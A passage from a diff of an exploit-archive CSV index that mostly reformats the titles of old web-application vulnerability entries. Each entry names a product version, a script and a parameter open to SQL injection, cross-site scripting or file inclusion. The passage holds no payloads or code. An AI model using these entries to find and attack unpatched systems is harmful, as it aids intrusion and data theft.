Access",2005-05-30,"GrayHatz Security Group",asp,webapps,0 40391,platforms/php/webapps/40391.txt,"WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure",2016-09-19,david-peltier,php,webapps,80 -25759,platforms/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - home.php Multiple Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25760,platforms/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 - product.php Multiple Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25761,platforms/php/webapps/25761.txt,"Qualiteam X-Cart 4.0.8 - error_message.php id Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25762,platforms/php/webapps/25762.txt,"Qualiteam X-Cart 4.0.8 - help.php section Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25763,platforms/php/webapps/25763.txt,"Qualiteam X-Cart 4.0.8 - orders.php mode Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25764,platforms/php/webapps/25764.txt,"Qualiteam X-Cart 4.0.8 - register.php mode Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25765,platforms/php/webapps/25765.txt,"Qualiteam X-Cart 4.0.8 - search.php mode Parameter Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25767,platforms/php/webapps/25767.txt,"Qualiteam X-Cart 4.0.8 - home.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25768,platforms/php/webapps/25768.txt,"Qualiteam X-Cart 4.0.8 - product.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25769,platforms/php/webapps/25769.txt,"Qualiteam X-Cart 4.0.8 - error_message.php id Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25770,platforms/php/webapps/25770.txt,"Qualiteam X-Cart 4.0.8 - help.php section Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25771,platforms/php/webapps/25771.txt,"Qualiteam X-Cart 4.0.8 - orders.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25772,platforms/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 - register.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25759,platforms/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25760,platforms/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25761,platforms/php/webapps/25761.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25762,platforms/php/webapps/25762.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25763,platforms/php/webapps/25763.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25764,platforms/php/webapps/25764.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25765,platforms/php/webapps/25765.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25767,platforms/php/webapps/25767.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25768,platforms/php/webapps/25768.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25769,platforms/php/webapps/25769.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25770,platforms/php/webapps/25770.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25771,platforms/php/webapps/25771.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25772,platforms/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 +25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 -33411,platforms/php/webapps/33411.txt,"iSupport 1.8 - ticket_function.php Multiple Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 +33411,platforms/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink and Essandre",php,webapps,0 33412,platforms/php/webapps/33412.txt,"iSupport 1.8 - 'index.php' which Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 -33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 -33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 -33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 -33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 +33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 +33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 +33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 +33419,platforms/php/webapps/33419.txt,"F3Site 2009 - 'mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 33420,platforms/php/webapps/33420.txt,"F3Site 2009 - 'mod/new.php' GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps,0 @@ -28524,7 +28525,7 @@ id,file,description,date,author,platform,type,port 33425,platforms/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 -25779,platforms/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 +25779,platforms/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injections",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,asp,webapps,0 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 @@ -28536,19 +28537,19 @@ id,file,description,date,author,platform,type,port 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - view.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x - upload.php Directory Traversal",2005-06-06,anonymous,php,webapps,0 -25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 - viewPrd.asp idcategory Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - editCategories.asp lid Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - modCustomCardPaymentOpt.asp idc Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - OptionFieldsEdit.asp idccr Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 -25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php where' Parameter Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 -25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - help.php Multiple Parameter Cross-Site Scripting",2005-06-07,SecWatch,php,webapps,0 +25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 - 'viewPrd.asp?idcategory' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 +25796,platforms/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - 'editCategories.asp?lid' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 +25797,platforms/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - 'modCustomCardPaymentOpt.asp?idc' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 +25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - 'OptionFieldsEdit.asp?idccr' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 +25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php?where' Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 +25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-07,SecWatch,php,webapps,0 25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 - default.asp SQL Injection",2005-06-08,hack_912,asp,webapps,0 25805,platforms/asp/webapps/25805.txt,"Loki Download Manager 2.0 - Catinfo.asp SQL Injection",2005-06-08,hack_912,asp,webapps,0 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 -25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversal",2013-05-29,"Adam Simuntis",hardware,webapps,0 +25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",hardware,webapps,0 25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 @@ -28557,22 +28558,22 @@ id,file,description,date,author,platform,type,port 25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0 25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0 -25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - index.asp Multiple Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - blog_comment.asp y Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 +25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections",2005-06-20,"Dedi Dwianto",asp,webapps,0 +25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25845,platforms/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - Trackback.asp Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 -26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps,0 +26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - AddItem.asp SQL Injection",2005-08-21,SmOk3,asp,webapps,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 @@ -28582,51 +28583,51 @@ id,file,description,date,author,platform,type,port 25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",asp,webapps,0 25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 -25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 -25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 -25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 -25863,platforms/asp/webapps/25863.txt,"DUware DUamazon Pro 3.0/3.1 - catDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25864,platforms/asp/webapps/25864.txt,"DUware DUamazon Pro 3.0/3.1 - review.asp iPro Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25865,platforms/asp/webapps/25865.txt,"DUware DUamazon Pro 3.0/3.1 - detail.asp iSub Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25866,platforms/asp/webapps/25866.txt,"DUware DUpaypal 3.0/3.1 - detail.asp iPro Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25867,platforms/asp/webapps/25867.txt,"DUware DUpaypal 3.0/3.1 - sub.asp iSub Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25868,platforms/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 - messages.asp iMsg Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25869,platforms/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 - post.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25870,platforms/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 - forums.asp iFor Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25871,platforms/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 - userEdit.asp id Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x - default.asp iState Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 -25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x - edit.asp iPro Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 +25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - 'type.asp?iType' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 +25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - 'productDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 +25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - 'productEdit.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 +25863,platforms/asp/webapps/25863.txt,"DUware DUamazon Pro 3.0/3.1 - 'catDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25864,platforms/asp/webapps/25864.txt,"DUware DUamazon Pro 3.0/3.1 - 'review.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25865,platforms/asp/webapps/25865.txt,"DUware DUamazon Pro 3.0/3.1 - 'detail.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25866,platforms/asp/webapps/25866.txt,"DUware DUpaypal 3.0/3.1 - 'detail.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25867,platforms/asp/webapps/25867.txt,"DUware DUpaypal 3.0/3.1 - 'sub.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25868,platforms/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25869,platforms/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25870,platforms/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25871,platforms/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 +25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x - 'default.asp?iState' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 +25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x - 'edit.asp?iPro' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection",2005-06-22,anonymous,asp,webapps,0 25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x - profile.php Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 -25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 +25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - 'menu_footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25879,platforms/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25880,platforms/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - search.php text_poisk Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25881,platforms/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 - set.php name_ig_array[] Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25882,platforms/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 - reply.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25884,platforms/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 - 'new.php' Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 -25886,platforms/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 - menu_header.php table_sql Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25887,platforms/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - set.php name_ig_array[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25889,platforms/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - reply.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 +25879,platforms/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - 'menu_tema.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 +25880,platforms/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - 'search.php?text_poisk' Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 +25881,platforms/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[]' Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 +25882,platforms/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 +25884,platforms/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 +25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps,0 +25886,platforms/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php?table_sql' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25887,platforms/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25889,platforms/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - 'reply.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25890,platforms/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php' name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25891,platforms/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 -25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 